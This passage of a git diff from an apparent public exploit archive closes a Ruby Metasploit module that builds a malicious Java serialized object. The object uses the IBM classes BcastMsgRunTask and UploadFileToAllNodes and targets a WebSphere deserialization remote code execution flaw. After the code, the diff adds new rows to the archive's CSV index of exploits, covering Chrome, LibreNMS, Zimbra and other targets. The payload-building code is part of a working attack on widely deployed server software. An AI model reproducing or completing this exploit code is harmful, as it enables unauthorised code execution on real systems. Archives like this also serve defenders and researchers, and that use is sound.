Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;") + + # Create the integer field and add the reference + forward_gather_field = Rex::Java::Serialization::Model::Field.new + forward_gather_field.type = 'int' + forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod') + + # Create the class description + msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new + msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask') + msg_class_desc.serial_version = 1 + msg_class_desc.flags = 2 + msg_class_desc.fields = [] + msg_class_desc.fields << forward_gather_field + msg_class_desc.fields << out_int_field + msg_class_desc.fields << task_field + msg_class_desc.fields << task_arg_field + + # Add annotations + msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new + msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new] + + # Add superclass + msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new + msg_class_desc.super_class.description = msg_obj + + # Set the member values + obj.class_data << ['int', 0] + obj.class_data << ['int', 1] + obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes') + obj.class_data << upfile_arg_obj + + msg_class_desc + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 651a09ebe..303f7480f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6473,6 +6473,7 @@ id,file,description,date,author,type,platform,port 46940,exploits/multiple/dos/46940.txt,"Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation",2019-05-29,"Google Security Research",dos,multiple, 46941,exploits/android/dos/46941.txt,"Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL",2019-05-29,"Google Security Research",dos,android, 46946,exploits/windows/dos/46946.py,"Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service",2019-05-30,n1xbyte,dos,windows, +46968,exploits/multiple/dos/46968.html,"Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free",2019-06-05,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17480,6 +17481,8 @@ id,file,description,date,author,type,platform,port 46942,exploits/java/remote/46942.rb,"Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)",2019-05-29,Metasploit,remote,java, 46960,exploits/hardware/remote/46960.py,"NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow",2019-06-04,@0x00string,remote,hardware, 46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware, +46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows, +46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41375,3 +41378,4 @@ id,file,description,date,author,type,platform,port 46964,exploits/java/webapps/46964.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, 46965,exploits/java/webapps/46965.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, 46966,exploits/java/webapps/46966.txt,"Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting",2019-06-04,Vingroup,webapps,java, +46967,exploits/jsp/webapps/46967.py,"Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery",2019-06-05,k8gege,webapps,jsp,